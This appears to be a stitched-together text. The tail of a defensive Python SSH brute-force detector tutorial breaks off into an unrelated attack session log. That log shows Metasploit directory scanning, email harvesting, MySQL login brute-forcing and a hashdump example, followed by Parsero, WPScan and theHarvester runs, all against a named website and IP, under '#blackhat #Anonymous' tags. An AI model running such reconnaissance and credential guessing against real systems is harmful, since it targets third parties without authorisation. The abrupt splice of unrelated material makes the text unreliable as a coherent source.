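May 29 19:58:42 web01 sshd[2143]: Failed password for root from 203.0.113.5 port 51004 ssh2
May 29 19:58:43 web01 sshd[2144]: Failed password for root from 203.0.113.5 port 51005 ssh2
May 29 19:58:44 web01 sshd[2145]: Failed password for root from 203.0.113.5 port 51006 ssh2
May 29 19:59:10 web01 sshd[2150]: Failed password for deploy from 198.51.100.7 port 40130 ssh2
May 29 20:03:30 web01 sshd[2188]: Failed password for deploy from 198.51.100.7 port 40140 ssh2
""".strip().splitlines()

if __name__ == "__main__":
    for ip, (count, first, last, names) in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {count} failures between {first:%H:%M:%S} and {last:%H:%M:%S}, users {names}")
```

The sliding window is the important design choice: a fixed per-day counter would also catch the operator who mistypes twice, while the window only fires on the rate that a wordlist run produces. Pair the alert with a host-level control (key-only authentication, no direct root login, rate limiting on 22) so the detection is confirmation, not the only defence.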


USE AUXILIARY DIR_SCANNER

msf auxiliary(ssh_login) > use auxiliary/scanner/http/dir_scanner
msf auxiliary(dir_scanner) > set THREADS 50
THREADS => 50
msf auxiliary(dir_scanner) > set RHOSTS 198.71.232.3
RHOSTS => 198.71.232.3
msf auxiliary(dir_scanner) > exploit

[*] Detecting error code
[*] Using code '404' as not found for 198.71.232.3
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) > set RHOSTS www.vyxunbnbs.com
RHOSTS => www.vyxunbnbs.com
msf auxiliary(dir_scanner) > exploit

[*] Detecting error code
[*] Using code '404' as not found for 198.71.232.3
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) > set RHOSTS vyxunbnbs.com
RHOSTS => vyxunbnbs.com
msf auxiliary(dir_scanner) > exploit

[*] Detecting error code
[*] Using code '404' as not found for 198.71.232.3
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) >


USE EMAIL_COLLECTOR

msf auxiliary(dir_scanner) > use auxiliary/gather/search_email_collector
msf auxiliary(search_email_collector) > set DOMAIN vyxunbnbs.com
DOMAIN => vyxunbnbs.com
msf auxiliary(search_email_collector) > run

[*] Harvesting emails .....
[*] Searching Google for email addresses from vyxunbnbs.com
[*] Extracting emails from Google search results...
[*] Searching Bing email addresses from vyxunbnbs.com
[*] Extracting emails from Bing search results...
[*] Searching Yahoo for email addresses from vyxunbnbs.com
[*] Extracting emails from Yahoo search results...
[*] Located 0 email addresses for vyxunbnbs.com
[*] Auxiliary module execution completed


USE MYSQL_LOGIN

msf auxiliary(search_email_collector) > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts

msf auxiliary(mysql_login) > set RHOSTS vyxunbnbs.com
RHOSTS => vyxunbnbs.com
msf auxiliary(mysql_login) > run

[-] 198.71.232.3:3306 MYSQL - Unable to connect: The connection timed out (198.71.232.3:3306).
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >

msf auxiliary(mysql_login) > creds

msf auxiliary(mysql_login) > sessions -l

Active sessions
===============

No active sessions.


USE LOOT

msf > loot -h

Usage: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]

-t <type1,type2> Search for a list of types
-h,--help Show this help information
-S,--search Search string to filter by

Here's an example of how one would populate the database with some 'loot'.

msf exploit(usermap_script) > use post/linux/gather/hashdump
msf post(hashdump) > show options

msf post(hashdump) > loot

Loot
====

host service type name content info path
---- ------- ---- ---- ------- ---- ----

USE AUXILIARY SCANNER HTTP CRAWLER

msf post(hashdump) > use auxiliary/scanner/http/crawler
msf auxiliary(crawler) > set RHOST vyxunbnbs.com
RHOST => vyxunbnbs.com
msf auxiliary(crawler) > run

[*] Crawling http://vyxunbnbs.com:80/...
[*] [00001/00500] 301 - vyxunbnbs.com - http://vyxunbnbs.com/ -> http://www.vyxunbnbs.com/
[*] Crawl of http://vyxunbnbs.com:80/ complete
[*] Auxiliary module execution completed

msf auxiliary(crawler) >

[*] Done.

CHECK THE SITE WITH PARSERO

┌─[root@parrot]─[~]
└──╼ #parsero -u www.vyxunbnbs.com

 ____
| _ \ __ _ _ __ ___ ___ _ __ ___
| |_) / _` | '__/ __|/ _ \ '__/ _ \
| __/ (_| | | \__ \ __/ | | (_) |
|_| \__,_|_| |___/\___|_| \___/

Starting Parsero v0.75 (https://github.com/behindthefirewalls/Parsero) at 05/29/16 19:59:04
Parsero scan report for www.vyxunbnbs.com
http://www.vyxunbnbs.com/images/ 404 Not Found
http://www.vyxunbnbs.com/_temp/ 404 Not Found
http://www.vyxunbnbs.com/statshistory/ 404 Not Found
http://www.vyxunbnbs.com/_backup/ 404 Not Found
http://www.vyxunbnbs.com/Flash/ 404 Not Found
http://www.vyxunbnbs.com/stats/ 404 Not Found
http://www.vyxunbnbs.com/plugins/ 404 Not Found
http://www.vyxunbnbs.com/_mygallery/ 404 Not Found
http://www.vyxunbnbs.com/_tempalbums/ 404 Not Found
http://www.vyxunbnbs.com/dbboon/ 404 Not Found
http://www.vyxunbnbs.com/cache/ 404 Not Found
http://www.vyxunbnbs.com/scripts/ 404 Not Found
http://www.vyxunbnbs.com/mobile/ 200 OK
http://www.vyxunbnbs.com/_tmpfileop/ 404 Not Found
http://www.vyxunbnbs.com/QSC/ 404 Not Found

[+] 15 links have been analyzed and 1 of them are available!!!

Finished in 2.3001761436462402 seconds


http://www.vyxunbnbs.com/mobile/ 200 OK


CHECK THE SITE WITH WPSCAN

┌─[root@parrot]─[~]
└──╼ #wpscan --url www.vyxunbnbs.com/mobile --enumerate u
_______________________________________________________________
 __ _______ _____
 \ \ / / __ \ / ____|
 \ \ /\ / /| |__) | (___ ___ __ _ _ __
 \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
 \ /\ / | | ____) | (__| (_| | | | |
 \/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 2.9
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________


[!] The remote website is up, but does not seem to be running WordPress.

COLLECT ALL THE EMAIL WITH THEHARVESTER

┌─[root@parrot]─[~]
└──╼ #theharvester -d vyxunbnbs.com -b all -n -c -t -l 50 -h

*******************************************************************
* *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* TheHarvester Ver. 2.7 *
* Coded by Christian Martorella *
* Edge-Security Research *
* cmartorella@edge-security.com *
*******************************************************************


Full harvest..
[-] Searching in Google..
Searching 0 results...
[-] Searching in PGP Key server..
[-] Searching in Bing..
Searching 50 results...
[-] Searching in Exalead..
Searching 50 results...
Searching 100 results...


[+] Emails found:
------------------
pixel-146454504959172-web-@vyxunbnbs.com

[+] Hosts found in search engines:
------------------------------------
[-] Resolving hostnames IPs...
198.71.232.3:www.vyxunbnbs.com

[+] Starting active queries:
[-]Performing reverse lookup in :198.71.232.0/24
Error in DNS resolvers

DONE

#blackhat #Anonymous #GLOBAL